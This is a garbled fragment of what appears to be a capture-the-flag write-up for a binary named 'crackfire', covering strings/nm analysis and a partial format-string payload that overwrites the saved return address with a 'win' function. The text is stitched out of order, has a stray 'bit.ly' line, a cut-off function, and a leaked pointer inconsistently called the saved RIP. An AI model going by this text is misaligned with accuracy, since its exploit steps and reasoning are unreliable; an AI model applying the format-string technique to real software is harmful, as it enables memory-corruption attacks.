Access granted! Flag: FLAG... The goal is to get the flag brute‑forcing the secret. 3. Static analysis 3.1. strings & nm strings crackfire | head # … many strings, including "Access granted!", "Invalid code!" nm -D crackfire | grep -i win # 0000000000401240 T win The function win prints the flag. The usual pattern in these CTF binaries is:
| Address | Symbol | Purpose | |---------|--------|---------| | 0x401260 | main | reads user input with scanf("%s", buf) | | 0x4010f0 | check | compares input to a hidden string ( secret ) | | 0x401240 | win | prints flag and exits |
# ---------------------------------------------------------------------- # 2. Build format‑string payload # ---------------------------------------------------------------------- low = win & 0xffffffff high = win >> 32 https- bit.ly crackfire
# Target location: saved RIP on stack (found via %p leaks) ret_addr = 0x7fffffffe0a8 # example address from a local run
The final layout:
Pseudo‑code:
def build_fmt_payload(ret_addr, win
0x555555555580 0x7fffffffde10 0x555555554b40 0x555555554b88 ... The pointer ( 0x555555554b40 ) matches the address of the saved RIP (confirmed by comparing to gdb ’s info frame ).